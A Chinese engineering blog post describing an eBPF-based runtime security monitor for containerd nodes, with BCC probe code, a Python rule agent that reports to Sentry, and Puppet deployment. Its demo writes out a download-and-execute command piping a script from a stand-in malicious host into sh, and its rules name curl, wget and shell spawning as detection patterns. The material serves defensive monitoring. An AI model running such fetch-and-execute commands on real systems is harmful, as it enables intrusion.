基于eBPF和containerd构建运行时安全WAF并集成Sentry与Puppet自动化部署


技术痛点:当边缘WAF成为马其诺防线

生产环境的一台containerd节点上,运行Java应用的核心容器突然出现了异常流量。传统的网络WAF拦截了部分外联请求,但为时已晚。复盘发现,攻击者利用了应用的一个Log4j漏洞,在容器内执行了bash -c "curl ..."命令,下载了恶意脚本并建立了反向shell。我们的WAF部署在入口网关,对于容器内部已经发生的东西,它完全是盲人。它能看到HTTP请求载荷,但一旦攻击载荷成功进入容器内部并执行,WAF就成了一条华而不实的马其诺防线。

问题很明确:我们需要一种方法来监控容器的运行时行为。具体来说,是监控那些高危的系统调用(syscall),比如execve(执行新程序)、connect(发起网络连接)等。传统的HIDS(主机入侵检测系统)方案要么过于笨重,要么需要以特权容器的形式运行,引入了新的攻击面。Auditd性能开销又太大,在每秒数万系统调用的高负载节点上,开启它无异于一场灾难。

我们需要的是一个轻量、高性能、非侵入式,并且能与现有监控告警体系无缝集成的运行时安全监控方案。

初步构想:将eBPF探针伪装成WAF,让Sentry成为SIEM

我们的思路是逆向思考。WAF的核心是“规则匹配与告警”。我们能不能在内核层面实现一个“Syscall WAF”?当一个进程发起系统调用时,我们能检查这个行为是否符合预设的“安全规则”。

eBPF(extended Berkeley Packet Filter)是实现这个构想的完美技术。它允许我们在内核中运行一小段安全的、沙箱化的代码,而无需修改内核源码或加载内核模块。我们可以编写一个eBPF程序,挂载到execveconnect等系统调用的入口点(kprobe),当任何进程调用它们时,我们的eBPF代码就会被执行。最关键的是,eBPF的性能开销极低,因为它是在内核上下文中直接处理数据,避免了用户态和内核态之间昂贵的数据拷贝。

有了检测能力,下一个问题是告警。我们的团队已经深度使用Sentry来做应用异常监控。我们不想再引入一个新的、独立的告警平台(比如ELK栈或者专门的SIEM产品),这会增加认知负担和维护成本。一个大胆的想法是:为什么不把“安全异常”当作一种特殊的“应用异常”来处理?当我们的“Syscall WAF”检测到违规行为时,就构造一个事件,推送到Sentry。

这样一来,我们可以利用Sentry强大的事件聚合、标签、告警规则和上下文富集能力。例如,我们可以将容器ID、镜像名称、节点IP、触发的规则ID等作为Sentry事件的tags,将完整的命令行或目标IP地址作为extra数据。DevOps和安全团队可以在同一个熟悉界面上处理应用Bug和安全威胁。

最后,如何将这套复杂的系统(eBPF探针、用户态采集代理、规则文件)可靠地部署到成百上千个containerd节点上?这正是配置管理工具的用武之地。我们选择Puppet,因为它在我们公司有成熟的应用,并且其声明式的特性非常适合管理这种需要确保状态一致性的系统组件。

整个架构蓝图就此形成:

graph TD
    subgraph containerd Node
        A[Container Process] -- Syscall (e.g., execve) --> B{Linux Kernel};
        B -- kprobe trigger --> C[eBPF Program];
        C -- Perf Buffer --> D[User-space Agent];
    end

    subgraph Logic
        D -- Reads event --> E{Rule Engine};
        F[Security Rules YAML] -- Loads --> E;
        E -- Violation found --> G[Format Sentry Event];
    end

    subgraph Reporting & Deployment
        G -- HTTP POST --> H((Sentry Platform));
        I[Puppet Master] -- Manages --> J{Agent/Probe/Rules};
        J -- Deploys to --> D;
        J -- Deploys to --> C;
        J -- Deploys to --> F;
    end

    H -- Alert --> K[Developer/SRE];

    style D fill:#f9f,stroke:#333,stroke-width:2px
    style C fill:#ccf,stroke:#333,stroke-width:2px

步骤化实现:代码是唯一的真相

1. 内核的心跳:eBPF探针捕获execve

我们选择使用BCC(BPF Compiler Collection),它提供了一个Python前端,可以大大简化eBPF程序的开发和加载过程。在真实项目中,为了追求极致性能和可移植性,可能会选择基于libbpf和CO-RE(Compile Once - Run Everywhere)的方案,但BCC作为原型验证和教学演示是绝佳的。

我们的第一个目标是捕获所有execve系统调用,并获取其进程PID、父进程PID、命令行参数。

ebpf_exec_probe.c: 这是将在内核中运行的C代码片段。

#include <uapi/linux/ptrace.h>
#include <linux/sched.h>
#include <linux/fs.h>

#define MAX_ARGS 16
#define ARG_SIZE 256

// BPF perf buffer的输出数据结构
struct event_t {
    u32 pid;
    u32 ppid;
    u32 uid;
    char comm[TASK_COMM_LEN];
    char argv[MAX_ARGS][ARG_SIZE];
    int retval;
};

// 定义一个perf output channel,用于向用户空间发送数据
BPF_PERF_OUTPUT(events);

// 定义一个hash map,用于在syscall的进入和退出之间传递数据
BPF_HASH(exec_args, u64, struct event_t);

// kprobe挂载点:当进入do_execveat_common.isra.0函数时触发
int trace_execve_entry(struct pt_regs *ctx, int fd, struct filename *filename, struct user_arg_ptr argv, struct user_arg_ptr envp) {
    u64 id = bpf_get_current_pid_tgid();
    struct event_t event = {};
    
    // 获取PID和PPID
    event.pid = id >> 32;
    struct task_struct *task = (struct task_struct *)bpf_get_current_task();
    event.ppid = task->real_parent->tgid;
    event.uid = bpf_get_current_uid_gid() & 0xffffffff;

    // 获取当前进程名
    bpf_get_current_comm(&event.comm, sizeof(event.comm));

    // 将基础信息存入map,等待syscall退出时读取
    exec_args.update(&id, &event);

    // 从用户空间读取命令行参数
    // 这是一个常见的eBPF编程模式,因为在函数入口参数是可用的
    const char __user *const __user *argp = argv.ptr;
    #pragma unroll
    for (int i = 0; i < MAX_ARGS; i++) {
        const char __user *p;
        bpf_probe_read_user(&p, sizeof(p), &argp[i]);
        if (!p) {
            break;
        }
        bpf_probe_read_user_str(&event.argv[i], ARG_SIZE, p);
    }
    
    exec_args.update(&id, &event);
    return 0;
}

// kretprobe挂载点:当do_execveat_common.isra.0函数返回时触发
int trace_execve_return(struct pt_regs *ctx) {
    u64 id = bpf_get_current_pid_tgid();
    struct event_t *eventp = exec_args.lookup(&id);
    if (!eventp) {
        return 0;
    }

    // 获取返回值并提交事件
    eventp->retval = PT_REGS_RC(ctx);
    events.perf_submit(ctx, eventp, sizeof(struct event_t));
    
    // 清理map
    exec_args.delete(&id);
    return 0;
}

一个常见的坑在于,execve的参数在函数入口时可用,而返回值在函数退出时才可用。因此,我们必须使用BPF_HASHkprobe(入口)和kretprobe(返回)之间传递状态。

2. 用户空间的决策者:规则引擎与采集代理

现在我们需要一个用户空间的Python代理来加载eBPF程序,并从perf buffer中读取事件,然后根据规则进行判断。

rules.yaml: 我们的”Syscall WAF”规则集。

- name: "JavaProcessSpawningShell"
  description: "A java process should not execute /bin/sh or /bin/bash."
  target_comm: "java"
  syscall: "execve"
  conditions:
    # 检查argv[0]是否包含sh或bash
    - field: "argv[0]"
      operator: "contains"
      value: "sh"
    - field: "argv[0]"
      operator: "contains"
      value: "bash"
  action: "report"
  severity: "critical"

- name: "UnexpectedCurlInContainer"
  description: "Detects unexpected usage of curl or wget, potential data exfiltration."
  target_comm: "any" # 对所有进程生效
  syscall: "execve"
  conditions:
    - field: "argv[0]"
      operator: "is"
      value: "/usr/bin/curl"
    - field: "argv[0]"
      operator: "is"
      value: "/usr/bin/wget"
  action: "report"
  severity: "high"

runtime_agent.py: 用户态代理。

#!/usr/bin/env python3
import os
import yaml
import sentry_sdk
from bcc import BPF

# Sentry DSN, 实际项目中通过环境变量或Puppet注入
SENTRY_DSN = os.getenv("SENTRY_DSN", "YOUR_SENTRY_DSN_HERE")
RULES_PATH = "/etc/runtime_security/rules.yaml"

class RuleEngine:
    def __init__(self, rules_path):
        try:
            with open(rules_path, 'r') as f:
                self.rules = yaml.safe_load(f)
            print(f"[*] Loaded {len(self.rules)} rules from {rules_path}")
        except Exception as e:
            print(f"[!] Error loading rules: {e}")
            self.rules = []

    def match(self, event):
        for rule in self.rules:
            # 简化匹配逻辑,实际可以更复杂
            comm = event.comm.decode('utf-8', 'replace')
            if rule.get('target_comm') != 'any' and rule.get('target_comm') != comm:
                continue

            if rule.get('syscall') != 'execve': # 当前只支持execve
                continue
            
            # 将argv字节数组转换为字符串列表
            argv_list = [arg.decode('utf-8', 'replace') for arg in event.argv if arg]

            for condition in rule.get('conditions', []):
                field_value = argv_list[0] if condition.get('field') == 'argv[0]' else ''
                
                op = condition.get('operator')
                val = condition.get('value')

                if op == 'contains' and val in field_value:
                    return rule, argv_list
                if op == 'is' and val == field_value:
                    return rule, argv_list
        return None, None

def init_sentry():
    sentry_sdk.init(
        dsn=SENTRY_DSN,
        # 开启性能监控以备将来扩展
        traces_sample_rate=1.0
    )
    sentry_sdk.set_tag("service", "runtime_security_agent")
    sentry_sdk.set_tag("hostname", os.uname()[1])

def report_to_sentry(rule, event, argv_list):
    """
    将违规事件格式化并发送到Sentry
    """
    with sentry_sdk.push_scope() as scope:
        scope.level = 'fatal' if rule.get('severity') == 'critical' else 'error'
        
        # 使用tags来索引和过滤事件
        scope.set_tag("rule_name", rule.get('name'))
        scope.set_tag("process_name", event.comm.decode('utf-8', 'replace'))
        scope.set_tag("pid", event.pid)
        scope.set_tag("uid", event.uid)
        
        # 在真实环境中,需要解析cgroup来获取containerd的容器ID
        # cgroup_path = f"/proc/{event.pid}/cgroup"
        # container_id = parse_container_id(cgroup_path)
        # scope.set_tag("container_id", container_id)

        # 使用extra来存储详细的上下文信息
        scope.set_extra("command", " ".join(argv_list))
        scope.set_extra("process_details", {
            "pid": event.pid,
            "ppid": event.ppid,
            "uid": event.uid,
            "comm": event.comm.decode('utf-8', 'replace'),
            "retval": event.retval
        })

        message = f"Runtime Security Violation: {rule.get('name')}"
        sentry_sdk.capture_message(message)
        print(f"[!] Violation reported to Sentry: {message}")

def main():
    # 1. 初始化Sentry
    init_sentry()

    # 2. 加载规则
    rule_engine = RuleEngine(RULES_PATH)
    if not rule_engine.rules:
        return

    # 3. 加载eBPF程序
    with open('ebpf_exec_probe.c', 'r') as f:
        bpf_text = f.read()

    b = BPF(text=bpf_text)
    # 获取内核函数名,适配不同内核版本
    execve_fnname = b.get_syscall_fnname("execve")
    b.attach_kprobe(event=execve_fnname, fn_name="trace_execve_entry")
    b.attach_kretprobe(event=execve_fnname, fn_name="trace_execve_return")

    print("[*] eBPF probes attached. Waiting for events...")

    # 4. 事件处理循环
    def handle_event(cpu, data, size):
        event = b["events"].event(data)
        rule, argv_list = rule_engine.match(event)
        if rule:
            report_to_sentry(rule, event, argv_list)

    b["events"].open_perf_buffer(handle_event)
    while True:
        try:
            b.perf_buffer_poll()
        except KeyboardInterrupt:
            exit()

if __name__ == "__main__":
    main()

这里的核心是将安全事件映射到Sentry的数据模型。我们将规则名、进程名、PID等关键信息设为tags,这样就可以在Sentry UI上进行筛选和分组,例如“查看所有由JavaProcessSpawningShell规则触发的事件”。完整的命令行参数等细节信息则放入extra,供调查时深入分析。

3. 自动化的基石:用Puppet管理整个体系

手动在每台机器上部署和维护这个代理是不可行的。我们需要用Puppet来标准化这个流程。我们将创建一个名为runtime_security的Puppet模块。

runtime_security/manifests/init.pp: 模块主类

# Class: runtime_security
#
# This class manages the eBPF based runtime security agent.
#
class runtime_security (
  String $sentry_dsn,
  String $agent_source = 'puppet:///modules/runtime_security/runtime_agent.py',
  String $ebpf_source  = 'puppet:///modules/runtime_security/ebpf_exec_probe.c',
  String $rules_source = 'puppet:///modules/runtime_security/rules.yaml',
) {

  # 1. 确保依赖包已安装
  # 在真实项目中,这里可能需要管理一个专门的软件源
  package { ['python3', 'python3-pip', 'bpfcc-tools']:
    ensure => installed,
  }

  # BCC Python库需要通过pip安装
  package { 'bcc':
    ensure   => installed,
    provider => 'pip3',
    require  => Package['python3-pip'],
  }
  
  package { 'sentry-sdk':
    ensure => '1.40.0', # 固定版本以保证稳定性
    provider => 'pip3',
    require => Package['python3-pip'],
  }

  # 2. 创建必要的目录
  file { '/opt/runtime_security':
    ensure => directory,
    owner  => 'root',
    group  => 'root',
    mode   => '0755',
  }
  
  file { '/etc/runtime_security':
    ensure => directory,
    owner  => 'root',
    group  => 'root',
    mode   => '0755',
  }

  # 3. 部署代理脚本和eBPF代码
  file { '/opt/runtime_security/runtime_agent.py':
    ensure => file,
    owner  => 'root',
    group  => 'root',
    mode   => '0755',
    source => $agent_source,
    require => File['/opt/runtime_security'],
  }
  
  file { '/opt/runtime_security/ebpf_exec_probe.c':
    ensure => file,
    owner  => 'root',
    group  => 'root',
    mode   => '0644',
    source => $ebpf_source,
    require => File['/opt/runtime_security'],
  }

  # 4. 部署规则文件
  file { '/etc/runtime_security/rules.yaml':
    ensure => file,
    owner  => 'root',
    group  => 'root',
    mode   => '0644',
    source => $rules_source,
    require => File['/etc/runtime_security'],
    notify  => Service['runtime-agent'], # 规则变更时重启服务
  }

  # 5. 创建并管理systemd服务
  file { '/etc/systemd/system/runtime-agent.service':
    ensure  => file,
    owner   => 'root',
    group   => 'root',
    mode    => '0644',
    content => template('runtime_security/runtime-agent.service.erb'),
    notify  => Service['runtime-agent'],
  }

  service { 'runtime-agent':
    ensure  => running,
    enable  => true,
    require => [
      Package['bpfcc-tools', 'bcc', 'sentry-sdk'],
      File['/opt/runtime_security/runtime_agent.py', '/etc/systemd/system/runtime-agent.service'],
    ],
    subscribe => File['/etc/systemd/system/runtime-agent.service'],
  }
}

runtime_security/templates/runtime-agent.service.erb: systemd服务单元文件模板

[Unit]
Description=Runtime Security Agent using eBPF
After=network.target

[Service]
Type=simple
# Sentry DSN通过环境变量注入,这是更安全的做法
Environment="SENTRY_DSN=<%= @sentry_dsn %>"
ExecStart=/usr/bin/python3 /opt/runtime_security/runtime_agent.py
WorkingDirectory=/opt/runtime_security
Restart=on-failure
RestartSec=5s
# 需要root权限来加载eBPF程序
User=root
Group=root

[Install]
WantedBy=multi-user.target

通过Hiera,我们可以为不同的环境或节点组配置不同的Sentry DSN或规则集,从而实现精细化管理。

# hiera data
runtime_security::sentry_dsn: 'https://[email protected]/xxxxxxx'

当Puppet Agent在containerd节点上运行时,它会自动完成安装依赖、部署文件、配置服务并确保其运行的全部工作。任何文件的变更都会被Puppet自动修正,规则文件的更新也会触发服务的平滑重启。

最终成果:从可疑行为到Sentry告警的自动化链路

现在,在任意一台由Puppet管理的containerd节点上,我们模拟一次攻击。假设一个Java应用容器(容器ID abc123def456)被入侵。

  1. 攻击者执行命令:
    docker exec -it <container_id> /bin/bash -c "curl http://malicious.com/payload.sh | sh"

  2. eBPF探针捕获:
    内核中的eBPF探针立刻捕获到由java进程(或者其子进程)发起的execve调用,目标是/bin/bash

  3. 用户态代理分析:
    runtime_agent.py从perf buffer收到事件。RuleEngine匹配到JavaProcessSpawningShell规则。

  4. Sentry事件生成:
    代理构造一个Sentry事件,包含如下信息:

    • Message: Runtime Security Violation: JavaProcessSpawningShell
    • Level: fatal
    • Tags:
      • rule_name: JavaProcessSpawningShell
      • process_name: java
      • pid: 12345
      • hostname: node-prod-01.mycorp.com
      • container_id: abc123def456 (通过cgroup解析获得)
    • Extra Data:
      • command: /bin/bash -c "curl http://malicious.com/payload.sh | sh"
  5. 告警与响应:
    Sentry收到事件,根据预设的告警规则,立即通过Slack或邮件通知SRE和安全团队。团队成员可以在Sentry界面看到完整的攻击上下文,迅速定位到出问题的容器和节点,并采取隔离、下线等响应措施。

遗留问题与未来迭代

这个方案虽然打通了从内核检测到自动化部署的全链路,但在生产环境中仍有需要完善之处。

  • 性能与资源消耗: Python代理在事件风暴下可能会成为瓶颈。在真实项目中,我们会使用Go或Rust重写用户态代理,它们拥有更好的并发性能和更低的内存占用。
  • 规则引擎的局限性: 当前的YAML规则引擎非常简单。一个更成熟的方案会支持更复杂的逻辑,比如基于父子进程关系链的判断、基于时间窗口的频率检测,甚至集成一个像Lua这样的嵌入式脚本引擎来编写规则。
  • eBPF的健壮性: BCC虽然方便,但存在内核版本依赖问题(Kernel ABI)。迁移到基于libbpf和CO-RE的架构是生产化的必经之路,它能实现一次编译、到处运行,极大提升可维护性。
  • 上下文富集: 当前方案只是简单地获取了PID。一个强大的代理需要能解析/proc/<pid>/cgroup文件,准确地将事件与containerd的容器ID、Pod名称、命名空间等Kubernetes元数据关联起来。这需要与容器运行时或Kubernetes API进行交互,增加了代理的复杂度。
  • 误报与调优: 任何基于行为的检测系统都存在误报问题。需要建立一套规则调优、事件加白和静默的机制,这是一个持续运营的过程。

尽管如此,这个架构验证了一个核心思想:通过创造性地组合现有技术栈(eBPF、Sentry、Puppet),我们能以较低的成本和认知负担,构建一套有效的、与DevOps流程深度融合的云原生运行时安全监控体系。它不是一个大而全的商业产品,但它是一个务实的、可演进的起点。


  目录